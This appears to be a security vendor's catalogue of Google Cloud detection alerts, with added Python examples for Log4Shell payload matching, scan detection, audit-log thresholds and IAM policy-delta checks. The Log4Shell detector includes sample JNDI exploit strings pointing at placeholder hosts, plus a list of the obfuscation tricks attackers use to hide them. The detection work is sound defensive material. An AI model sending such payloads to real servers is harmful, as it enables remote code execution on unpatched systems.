Overview
Google Cloud Platform (GCP) is one of the largest cloud providers out there, and as such requires organizations to protect themselves with cloud security monitoring. Devo’s Threat Research Team’s content contains many GCP detections so your organization can monitor your GCP infrastructure, look for areas of risk, or help respond to threats as they emerge.

An attacker could intend to modify, or gain, privileges on a Cloud SQL database. This alert detects when a Cloud SQL database has been modified or deleted, and when any user has gained privileges on a database or any of its tables. Source table →

An attacker could be enumerating GCS buckets to gain more information about the Google Cloud project. This alert filters Google Cloud Audit Logs for entries whose methodName is storage.buckets.list. It also filters on the principal account so that only actions performed by service accounts are kept. Source table →

An attacker could be modifying permissions, or accessibility, over a bucket. This alert filters Google Cloud Audit Logs for entries whose methodName is storage.buckets.update. It also extracts the name of the bucket being updated so that it can be included in the alert template. Source table →

An attacker could be modifying permissions, or accessibility, over a bucket to make it public, or creating a public one. This alert filters Google Cloud Audit Logs for entries whose methodName is storage.buckets.create or storage.setIamPermissions. It also extracts the name of the bucket being created or updated so that it can be included in the alert template. It then retrieves the first five member/action pairs from the bindingDeltas array and checks, for each pair, whether member equals allUsers and action equals ADD. Note that a grant appearing after the fifth binding delta is not inspected. Source table →

Alert that checks for attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads placed in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies. [WARNING] This alert detects attack patterns and can generate a high volume of events because of the number of scanners currently testing systems on the Internet, so it is likely to need some tuning. Source table →
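
The pattern matching described above, as an added example written for this page rather than Devo's query: it checks the request fields the alert names (URL, User-Agent, Referer, body), URL-decodes them and collapses the Log4j lookup tricks commonly used to hide the literal `jndi` before matching. The request records are constructed samples; the field names are assumptions.

```python
"""Log4Shell (CVE-2021-44228) payload detection over request fields.

Added example for this page, not Devo's alert logic. It scans the places
the alert description lists (URL, User-Agent, Referer, request body) and
undoes the common obfuscations before matching. The request records
below are constructed samples; the field names are assumptions.
"""
import re
from urllib.parse import unquote

# Log4j lookup tricks used to hide the literal "jndi":
#   ${lower:j} / ${upper:j}        -> j   (case is irrelevant to the match)
#   ${env:NOPE:-j} and ${::-j}     -> j   (the ":-default" fallback)
LOOKUP_CASE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*?)\s*\}", re.IGNORECASE)
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*?)\}")
# After normalisation every variant collapses to ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

FIELDS = ("url", "user_agent", "referer", "body")  # assumed record keys


def normalize(value: str, max_rounds: int = 10) -> str:
    """Repeatedly URL-decode and resolve innermost lookups until stable."""
    for _ in range(max_rounds):
        new = unquote(value)
        new = LOOKUP_CASE.sub(lambda m: m.group(1), new)
        new = LOOKUP_DEFAULT.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def scan_request(request: dict) -> list:
    """Return one finding per field that carries a JNDI lookup."""
    findings = []
    for field in FIELDS:
        raw = request.get(field)
        if not raw:
            continue
        m = JNDI.search(normalize(raw))
        if m:
            findings.append({"field": field, "scheme": m.group(1).lower()})
    return findings


# Constructed samples: plain payload in the URL, an obfuscated one in the
# User-Agent, a double-wrapped percent-encoded one, and a benign request.
SAMPLES = [
    {"url": "/index.php?q=${jndi:ldap://203.0.113.9:1389/a}", "user_agent": "Mozilla/5.0"},
    {"url": "/", "user_agent": "${${lower:j}ndi:rmi://203.0.113.9/x}"},
    {"url": "/?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fcanary.example%2Fa%7D"},
    {"url": "/api/health", "body": "note=${date:yyyy-MM-dd}"},
]

if __name__ == "__main__":
    for r in SAMPLES:
        print(scan_request(r))
```

Tuning is the hard part, as the warning above says: most matches will be Internet-wide scanners. Grouping by source IP and only escalating when the callback scheme points at an internal address, or when the same host later makes an outbound LDAP/RMI connection, keeps the volume manageable.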

An attacker could be performing reconnaissance against a network (a port scan against a single host). This alert filters events from cloud.gcp.compute.firewall, keeping those whose source IP is public and whose destination IP is private. It then groups by project, location, source IP and destination IP, and counts the number of distinct destination ports. The alert is triggered when this number is greater than five. Source table →

An attacker could be performing reconnaissance against a network (a sweep of many hosts on one port). This alert filters events from cloud.gcp.compute.firewall, keeping those whose source IP is public and whose destination IP is private. It then groups by project, location, source IP and destination port, and counts the number of distinct destination IPs. The alert is triggered when this number is greater than five. Source table →
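
The two grouping rules above (distinct ports per host, distinct hosts per port), as an added example over constructed VPC firewall log records; this is illustrative code, not the Devo query. Field names follow the jsonPayload.connection block of VPC firewall logs (src_ip, dest_ip, dest_port) plus project and location labels, which is an assumption about how the records are flattened.

```python
"""Scan detection over GCP VPC firewall log records.

Added example written for this page (not the Devo alert's query). The two
functions mirror the two alerts above: many destination ports on one host
(port scan) and many hosts on one port (host sweep). Records are
constructed; field names are assumed to follow the VPC firewall log
jsonPayload.connection block (src_ip, dest_ip, dest_port).
"""
import ipaddress
from collections import defaultdict

THRESHOLD = 5  # alert when the distinct count is greater than this

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(ip: str) -> bool:
    return any(ipaddress.ip_address(ip) in net for net in RFC1918)


def is_public(ip: str) -> bool:
    # Deliberately "not RFC1918/loopback/link-local/multicast" rather than
    # ipaddress.is_global, so the 203.0.113.0/24 documentation range used in
    # the samples counts as public. Prefer is_global in production.
    addr = ipaddress.ip_address(ip)
    return not (is_private(ip) or addr.is_loopback or addr.is_link_local or addr.is_multicast)


def inbound(records):
    """Keep only flows from a public source to a private destination."""
    return [r for r in records if is_public(r["src_ip"]) and is_private(r["dest_ip"])]


def _distinct_over(records, group_fields, counted_field, threshold):
    groups = defaultdict(set)
    for r in records:
        groups[tuple(r[f] for f in group_fields)].add(r[counted_field])
    return {k: sorted(v) for k, v in groups.items() if len(v) > threshold}


def port_scans(records, threshold=THRESHOLD):
    """(project, location, src_ip, dest_ip) -> distinct dest ports, if > threshold."""
    return _distinct_over(inbound(records), ("project", "location", "src_ip", "dest_ip"),
                          "dest_port", threshold)


def host_sweeps(records, threshold=THRESHOLD):
    """(project, location, src_ip, dest_port) -> distinct dest IPs, if > threshold."""
    return _distinct_over(inbound(records), ("project", "location", "src_ip", "dest_port"),
                          "dest_ip", threshold)


def flow(src, dst, port, project="demo-project", location="europe-west1"):
    return {"project": project, "location": location, "src_ip": src, "dest_ip": dst, "dest_port": port}


# Constructed sample: one scanner probing six ports on one host, the same
# scanner sweeping SSH across a subnet, private-to-private noise, and a
# public client touching three ports (below threshold).
SAMPLE = (
    [flow("203.0.113.9", "10.0.0.5", p) for p in (21, 22, 80, 443, 3389, 8080)]
    + [flow("203.0.113.9", f"10.0.1.{i}", 22) for i in range(10, 17)]
    + [flow("10.0.0.5", "10.0.0.6", p) for p in range(1000, 1010)]
    + [flow("198.51.100.7", "10.0.0.5", p) for p in (80, 443, 8443)]
)

if __name__ == "__main__":
    print("port scans:", port_scans(SAMPLE))
    print("host sweeps:", host_sweeps(SAMPLE))
```

The port-22 probe of the first host also counts toward the sweep, so the same scanner shows up in both results; that overlap is expected and is a useful correlation key when both alerts fire.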

Destroying a crypto key is an unusual event that should be checked and considered in context with other suspicious events occurring in the same GCP project. Source table →

An attacker could be attempting to access, or modify, the Secret Manager service. This alert filters Google Cloud Audit Logs for entries whose protoPayload_methodName contains the string SecretManagerService, which selects events coming from the Secret Manager service. It then counts the number of events and triggers when the count is greater than 10. Source table →

An attacker could be creating a service account to gain persistence on the project. Source table →

An attacker could intend to enumerate the environment. This alert identifies GCP API requests using GET and LIST methods which, when observed in combination, could indicate that an actor is trying to enumerate the environment. These events are usually generated during normal operations, so this alert should be used as context around other security incidents rather than on its own. Source table →

An attacker could intend to gain access to a Secret or ConfigMap. Source table →

An attacker could be performing reconnaissance on a GCP project trying to enumerate permissions. This alert filters events from the cloud.gcp table, keeping those whose protoPayload_status_code equals 7. This is the gRPC PERMISSION_DENIED status, returned when the caller is authenticated but not authorized for the requested API call. It then lower-cases the principal email and groups by resource_labels_project_id and lowerPrincipalEmail. The alert is triggered when the number of events in a group is greater than 10. Source table →

An attacker could intend to collect data by making the contents of a GCP Storage bucket public. This alert detects when a user makes the entire content of a storage bucket public. Source table →

An adversary may attempt to enumerate the cloud services running on a GCP Kubernetes cluster's pods. This alert is triggered when more than 10 unauthorized requests against the cluster's pods are detected from the same IP address in less than five minutes. Source table →
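
The three count-based alerts above (Secret Manager activity over 10 events, more than 10 PERMISSION_DENIED responses per project and lower-cased principal, and more than 10 unauthorized pod requests from one IP within five minutes) share one shape, so here is a single sliding-window counter serving all three. This is an added example, not Devo's queries; it reads the native Cloud Audit Log JSON layout (protoPayload.status.code, protoPayload.requestMetadata.callerIp), onto which Devo's flattened names such as protoPayload_status_code map. The audit log entries are constructed.

```python
"""Count-based alerts over GCP Cloud Audit Log entries.

Added example for this page, not the Devo queries themselves. One sliding
window counter serves the three alerts above: permission-denied requests
per (project, principal), Secret Manager activity, and unauthorized
requests against GKE pods per caller IP within five minutes. Entries use
the native Cloud Audit Log JSON layout; all entries are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

PERMISSION_DENIED = 7  # google.rpc.Code; 16 would be UNAUTHENTICATED


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def windowed_threshold(entries, key_fn, predicate, threshold=10, window=None):
    """Return {key: timestamp of first breach} for keys whose matching entries
    exceed `threshold` inside `window` (a timedelta, or None for no window)."""
    recent = defaultdict(deque)
    alerts = {}
    for e in sorted(entries, key=lambda e: e["timestamp"]):
        if not predicate(e):
            continue
        key = key_fn(e)
        ts = parse_ts(e["timestamp"])
        q = recent[key]
        q.append(ts)
        if window is not None:
            while ts - q[0] > window:  # evict entries older than the window
                q.popleft()
        if len(q) > threshold and key not in alerts:
            alerts[key] = ts
    return alerts


def payload(e):
    return e.get("protoPayload", {})


def principal(e):
    return payload(e).get("authenticationInfo", {}).get("principalEmail", "")


def project(e):
    return e.get("resource", {}).get("labels", {}).get("project_id")


def is_denied(e):
    return payload(e).get("status", {}).get("code") == PERMISSION_DENIED


def permission_denied_spray(entries):
    # Page's rule: group by project and lower-cased principal; no window is stated
    return windowed_threshold(entries, lambda e: (project(e), principal(e).lower()), is_denied)


def secret_manager_activity(entries):
    return windowed_threshold(entries, project,
                              lambda e: "SecretManagerService" in payload(e).get("methodName", ""))


def gke_pod_enumeration(entries):
    caller = lambda e: payload(e).get("requestMetadata", {}).get("callerIp")
    on_pods = lambda e: (is_denied(e) and e.get("resource", {}).get("type") == "k8s_cluster"
                         and ".pods." in payload(e).get("methodName", ""))
    return windowed_threshold(entries, caller, on_pods, threshold=10, window=timedelta(minutes=5))


def entry(ts, method, principal_email, code=0, resource_type="project",
          caller_ip="198.51.100.7", proj="demo-project"):
    """Constructed minimal audit log entry."""
    return {"timestamp": ts.strftime("%Y-%m-%dT%H:%M:%SZ"),
            "resource": {"type": resource_type, "labels": {"project_id": proj}},
            "protoPayload": {"methodName": method,
                             "authenticationInfo": {"principalEmail": principal_email},
                             "requestMetadata": {"callerIp": caller_ip},
                             "status": {"code": code}}}


T0 = datetime(2024, 1, 1, 12, 0, tzinfo=timezone.utc)
SAMPLE = (
    # 11 PERMISSION_DENIED calls from one user in under two minutes, mixed-case principal
    [entry(T0 + timedelta(seconds=10 * i), "google.iam.admin.v1.ListRoles",
           "Attacker@Example.com" if i % 2 else "attacker@example.com", code=7) for i in range(11)]
    # a legitimate user tripping a few denials
    + [entry(T0 + timedelta(seconds=30 * i), "storage.buckets.list", "dev@example.com", code=7) for i in range(4)]
    # 11 pod listings from one IP, one per minute: never more than 10 inside any 5-minute window
    + [entry(T0 + timedelta(minutes=i), "io.k8s.core.v1.pods.list", "system:anonymous", code=7,
             resource_type="k8s_cluster", caller_ip="203.0.113.9") for i in range(11)]
    # 11 pod listings from another IP in under a minute
    + [entry(T0 + timedelta(seconds=5 * i), "io.k8s.core.v1.pods.list", "system:anonymous", code=7,
             resource_type="k8s_cluster", caller_ip="203.0.113.77") for i in range(11)]
    # 12 Secret Manager reads by a workload service account
    + [entry(T0 + timedelta(seconds=i), "google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion",
             "app@demo-project.iam.gserviceaccount.com") for i in range(12)]
)

if __name__ == "__main__":
    print(permission_denied_spray(SAMPLE))
    print(gke_pod_enumeration(SAMPLE))
    print(secret_manager_activity(SAMPLE))
```

Note that the anonymous Kubernetes caller also trips the permission-denied rule, since those responses are PERMISSION_DENIED as well; that is the kind of overlap the enumeration alerts are meant to be read against.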

An attacker may have tried to bypass perimeter security by creating a firewall rule. This alert detects any attempt to create a firewall rule in Google Cloud Compute Engine. Source table →

An attacker may have tried to bypass perimeter security by modifying a firewall rule. This alert detects any attempt to modify a firewall rule in Google Cloud Compute Engine. Source table →

An attacker could be modifying a logging sink to avoid detection, or to redirect logs to a different destination. Source table →

An attacker may have created a new role to gain persistence. This alert is triggered when a new Google Cloud IAM custom role is created. Source table →

An adversary could delete an IAM custom role to disrupt the availability of system and network resources by inhibiting access to accounts used by legitimate users. This alert is triggered when a Google Cloud IAM custom role is deleted. Source table →

An adversary could delete an IAM service account key to manipulate the service account and maintain access to the systems. Source table →

An adversary could remove a Google Cloud Logging bucket to impair event aggregation and analysis mechanisms. This alert is triggered when a Google Cloud Logging bucket is deleted. Source table →

Listing queues is one of the first steps taken by an attacker in order to enumerate a Google Cloud Platform project. Source table →

An adversary could create a Google Cloud Pub/Sub subscription to collect data. This alert is triggered when a Google Cloud Pub/Sub subscription is created. Source table →

An adversary could delete a Google Cloud Pub/Sub subscription to impair event aggregation and analysis mechanisms. This alert is triggered when a Google Cloud Pub/Sub subscription is deleted. Source table →

An adversary may modify Storage bucket permissions to evade access control lists (ACLs) and access protected files. Source table →

GCPPloit is a framework to audit GCP accounts; attackers could use it to find security issues. Source table →

An adversary could create a Google Cloud Pub/Sub topic to collect data. This alert is triggered when a Google Cloud Pub/Sub topic is created. Source table →

An adversary could delete a Google Cloud Pub/Sub topic to impair event aggregation and analysis mechanisms. This alert is triggered when a Google Cloud Pub/Sub topic is deleted. Source table →

An attacker could delete a service account to interrupt the availability of systems and network resources by inhibiting access to accounts used by legitimate users. This alert is triggered when a Google Cloud IAM service account is deleted. Source table →

An adversary could disable an IAM service account to manipulate the service account and maintain access to the systems. This alert is triggered when a Google Cloud IAM service account is disabled. Source table →

An adversary could create an IAM service account key to manipulate a service account and maintain access to the systems. This alert is triggered when a Google Cloud IAM service account key is created. Source table →

An adversary could delete a Google Cloud Storage bucket to destroy data and files on specific systems, or in large numbers across a network, to interrupt the availability of systems, services and network resources. This alert is triggered when a Google Cloud Storage bucket is deleted. Source table →

A high-risk role has been assigned to a user, which could indicate that a malicious actor is trying to escalate privileges within a project. This alert filters Google Cloud Audit Logs for entries whose method name equals SetIamPolicy. It then parses the roles and actions from the binding deltas in the protoPayload. Only the first five action/role pairs are considered; any following actions or roles are disregarded. The alert triggers when one of the pairs has action equal to ADD and a role that is one of: roles/owner, roles/editor, roles/iam.serviceAccountUser, roles/iam.serviceAccountAdmin, roles/iam.serviceAccountTokenCreator, roles/dataflow.developer, roles/dataflow.admin, roles/composer.admin, roles/dataproc.admin or roles/dataproc.editor. Source table →
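
Both binding-delta alerts on this page (the public-bucket check on storage.buckets.create / storage.setIamPermissions and the high-risk role check on SetIamPolicy above) walk the same protoPayload.serviceData.policyDelta.bindingDeltas array, so one added example covers both. It is illustrative code, not Devo's query, and it goes slightly beyond the page's rules: allAuthenticatedUsers (any Google account) is treated as public alongside allUsers, and the five-delta limit is a parameter so that its blind spot can be demonstrated. The audit log entries are constructed.

```python
"""IAM policy-delta checks over GCP Cloud Audit Log entries.

Added example for this page, not Devo's query. It covers the
public-bucket alert (storage.buckets.create / storage.setIamPermissions
with an ADD of allUsers) and the high-risk role alert (SetIamPolicy).
Assumptions: the native audit log layout
protoPayload.serviceData.policyDelta.bindingDeltas (newer services use
protoPayload.metadata), allAuthenticatedUsers treated as public, and the
five-delta limit exposed as a parameter. All entries are constructed.
"""
HIGH_RISK_ROLES = {
    "roles/owner", "roles/editor",
    "roles/iam.serviceAccountUser", "roles/iam.serviceAccountAdmin",
    "roles/iam.serviceAccountTokenCreator",
    "roles/dataflow.developer", "roles/dataflow.admin",
    "roles/composer.admin", "roles/dataproc.admin", "roles/dataproc.editor",
}
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}
DEFAULT_LIMIT = 5  # the page's alerts inspect only the first five deltas


def binding_deltas(entry, limit=DEFAULT_LIMIT):
    payload = entry.get("protoPayload", {})
    for key in ("serviceData", "metadata"):
        deltas = payload.get(key, {}).get("policyDelta", {}).get("bindingDeltas")
        if deltas:
            return deltas if limit is None else deltas[:limit]
    return []


def bucket_name(entry):
    labels = entry.get("resource", {}).get("labels", {})
    if labels.get("bucket_name"):
        return labels["bucket_name"]
    # fall back to resourceName "projects/_/buckets/<name>"
    rn = entry.get("protoPayload", {}).get("resourceName", "")
    return rn.split("/buckets/", 1)[1].split("/")[0] if "/buckets/" in rn else None


def public_bucket_grant(entry, limit=DEFAULT_LIMIT):
    """First ADD of a public member, with the bucket name for the alert template."""
    method = entry.get("protoPayload", {}).get("methodName")
    if method not in ("storage.buckets.create", "storage.setIamPermissions"):
        return None
    for d in binding_deltas(entry, limit):
        if d.get("action") == "ADD" and d.get("member") in PUBLIC_MEMBERS:
            return {"bucket": bucket_name(entry), "member": d["member"], "role": d.get("role")}
    return None


def high_risk_role_grant(entry, limit=DEFAULT_LIMIT):
    """(role, member) pairs ADDed with a high-risk role, or None."""
    if entry.get("protoPayload", {}).get("methodName") != "SetIamPolicy":
        return None
    hits = [(d.get("role"), d.get("member")) for d in binding_deltas(entry, limit)
            if d.get("action") == "ADD" and d.get("role") in HIGH_RISK_ROLES]
    return hits or None


def audit(method, deltas, resource_name=None, labels=None):
    """Constructed minimal audit log entry carrying a policy delta."""
    return {"protoPayload": {"methodName": method, "resourceName": resource_name or "",
                             "serviceData": {"policyDelta": {"bindingDeltas": deltas}}},
            "resource": {"labels": labels or {}}}


PUBLIC_BUCKET = audit("storage.setIamPermissions",
                      [{"action": "ADD", "role": "roles/storage.objectViewer", "member": "allUsers"}],
                      resource_name="projects/_/buckets/backup-dump")
PRIVATE_SHARE = audit("storage.setIamPermissions",
                      [{"action": "ADD", "role": "roles/storage.objectViewer", "member": "user:bob@example.com"}],
                      labels={"bucket_name": "team-docs"})
# a public grant hidden behind five harmless deltas: missed under the page's limit
BURIED = audit("storage.buckets.create",
               [{"action": "ADD", "role": "roles/storage.admin", "member": f"user:u{i}@example.com"}
                for i in range(5)]
               + [{"action": "ADD", "role": "roles/storage.objectViewer", "member": "allAuthenticatedUsers"}],
               labels={"bucket_name": "new-bucket"})
OWNER_GRANT = audit("SetIamPolicy",
                    [{"action": "REMOVE", "role": "roles/viewer", "member": "user:eve@example.com"},
                     {"action": "ADD", "role": "roles/owner", "member": "user:eve@example.com"}])
VIEWER_GRANT = audit("SetIamPolicy",
                     [{"action": "ADD", "role": "roles/viewer", "member": "user:eve@example.com"}])

if __name__ == "__main__":
    for e in (PUBLIC_BUCKET, PRIVATE_SHARE, BURIED, OWNER_GRANT, VIEWER_GRANT):
        print(public_bucket_grant(e), high_risk_role_grant(e))
```

The BURIED entry is the practical caveat: a policy update that adds several ordinary members before the public one passes the five-pair check untouched, so if your pipeline can afford it, drop the limit rather than trust it.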

An attacker may have deleted a VPC route to interrupt the availability of systems and network resources. This alert is triggered when a Google Cloud Virtual Private Cloud route has been deleted. Source table → cloud.gcp

An attacker may have created a new route to bypass restrictions on traffic routing that segregate trusted and untrusted networks. This alert is triggered when a new Google Cloud Virtual Private Cloud route has been created. Source table →

An attacker could delete a Virtual Private Cloud (VPC) network to interrupt the availability of systems and network resources. This alert filters Google Cloud Audit Logs for entries whose method name matches "v*.compute.networks.delete", which detects when a Google Cloud VPC network is deleted. Source table →

An attacker could be deleting a logging sink to avoid detection. This alert filters Google Cloud Audit Logs for entries whose method name equals google.logging.v2.ConfigServiceV2.DeleteSink. Source table →

An attacker may have tried to bypass perimeter security by deleting a firewall rule. Source table →
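
Most alerts on this page reduce to "methodName equals X", sometimes with a principal filter or a field extraction. The following added example (written for this page, not Devo's queries) implements four of them over constructed audit log entries: bucket listing by service accounts only, bucket update with the bucket name extracted, VPC network deletion with the "v*" version wildcard, and logging sink deletion. The `field()` helper reads either the native nested JSON or a Devo-style flattened key such as protoPayload_methodName; the exact flattening is an assumption.

```python
"""Method-name based audit log rules, as an added example rather than
Devo's queries. Covers the bucket-listing, bucket-update,
VPC-network-deletion and logging-sink-deletion alerts on this page.
Entries are constructed and may be either native nested JSON or
Devo-style flattened keys (protoPayload_methodName); `field()` reads both.
"""
from fnmatch import fnmatchcase


def field(entry, path):
    """Read 'a.b.c' from nested JSON, or from a flattened 'a_b_c' key."""
    flat = entry.get(path.replace(".", "_"))
    if flat is not None:
        return flat
    cur = entry
    for part in path.split("."):
        if not isinstance(cur, dict):
            return None
        cur = cur.get(part)
    return cur


def is_service_account(principal):
    return bool(principal) and principal.endswith(".gserviceaccount.com")


def bucket_from(entry):
    rn = field(entry, "protoPayload.resourceName") or ""
    return rn.split("/buckets/", 1)[1].split("/")[0] if "/buckets/" in rn else None


def resource_name(entry):
    return field(entry, "protoPayload.resourceName")


# (alert name, methodName glob, extra condition, detail to carry into the alert)
RULES = [
    ("GCS bucket enumeration by service account", "storage.buckets.list",
     lambda e: is_service_account(field(e, "protoPayload.authenticationInfo.principalEmail")),
     lambda e: None),
    ("GCS bucket updated", "storage.buckets.update", lambda e: True, bucket_from),
    ("VPC network deleted", "v*.compute.networks.delete", lambda e: True, resource_name),
    ("Logging sink deleted", "google.logging.v2.ConfigServiceV2.DeleteSink", lambda e: True, resource_name),
]


def apply_rules(entries):
    findings = []
    for e in entries:
        method = field(e, "protoPayload.methodName") or ""
        principal = field(e, "protoPayload.authenticationInfo.principalEmail")
        for name, pattern, condition, detail in RULES:
            if fnmatchcase(method, pattern) and condition(e):
                findings.append({"alert": name, "principal": principal, "detail": detail(e)})
    return findings


def nested(method, principal, resource=""):
    """Constructed native-layout entry."""
    return {"protoPayload": {"methodName": method, "resourceName": resource,
                             "authenticationInfo": {"principalEmail": principal}}}


SAMPLE = [
    nested("storage.buckets.list", "scanner@demo-project.iam.gserviceaccount.com"),
    nested("storage.buckets.list", "alice@example.com"),  # human caller: filtered out
    nested("storage.buckets.update", "alice@example.com", "projects/_/buckets/team-docs"),
    nested("v1.compute.networks.delete", "alice@example.com",
           "projects/demo-project/global/networks/prod-vpc"),
    nested("beta.compute.networks.delete", "alice@example.com",
           "projects/demo-project/global/networks/dev-vpc"),  # "v*" does not match this
    # Devo-style flattened record for the sink deletion
    {"protoPayload_methodName": "google.logging.v2.ConfigServiceV2.DeleteSink",
     "protoPayload_authenticationInfo_principalEmail": "alice@example.com",
     "protoPayload_resourceName": "projects/demo-project/sinks/siem-export"},
]

if __name__ == "__main__":
    for f in apply_rules(SAMPLE):
        print(f)
```

The fifth sample is worth checking against your own logs: Compute Engine calls made through the beta API surface are, as far as I have seen, logged with a `beta.` prefix rather than `v1.`, which the "v*" glob does not match; if that holds in your project, widen the pattern to "*.compute.networks.delete".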

Updating the state of a crypto key is an unusual event that should be checked and considered in context with other suspicious events occurring in the same GCP project. Source table →